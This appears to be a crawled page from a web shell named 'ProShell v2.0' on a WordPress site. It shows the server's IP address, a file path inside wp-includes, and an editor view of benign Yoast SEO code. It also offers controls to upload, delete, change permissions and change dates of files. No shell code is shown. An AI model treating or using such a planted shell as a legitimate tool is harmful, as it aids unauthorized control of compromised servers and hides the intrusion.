ProShell v2.0
Dashboard
Server Info
Server: 158.106.128.192
PHP: 8.2.33
home
planet5
public_html
bansibaba.com
wp-includes
2026-09-12 14:22:11
Editing: cornerstone-enabled-conditional.php
Cancel
Save Changes
<?php namespace Yoast\WP\SEO\Premium\Conditionals; use Yoast\WP\SEO\Conditionals\Conditional; use Yoast\WP\SEO\Helpers\Options_Helper; /** * Cornerstone_Enabled_Conditional class. */ class Cornerstone_Enabled_Conditional implements Conditional { /** * The options helper. * * @var Options_Helper */ protected $options_helper; /** * Cornerstone_Enabled_Conditional constructor. * * @codeCoverageIgnore * * @param Options_Helper $options_helper The options helper. */ public function __construct( Options_Helper $options_helper ) { $this->options_helper = $options_helper; } /** * Returns `true` when the cornerstone content feature is enabled. * * @return bool `true` when the cornerstone content feature is enabled. */ public function is_met() { return $this->options_helper->get( 'enable_cornerstone_content' ); } }
Upload Files
Cancel
Upload
Create New
Cancel
Create
Change Permissions
Cancel
Save
Change Date
Cancel
Save
Rename Item
Cancel
Save
Confirm Delete
Are you sure you want to delete the selected items?
Cancel
Delete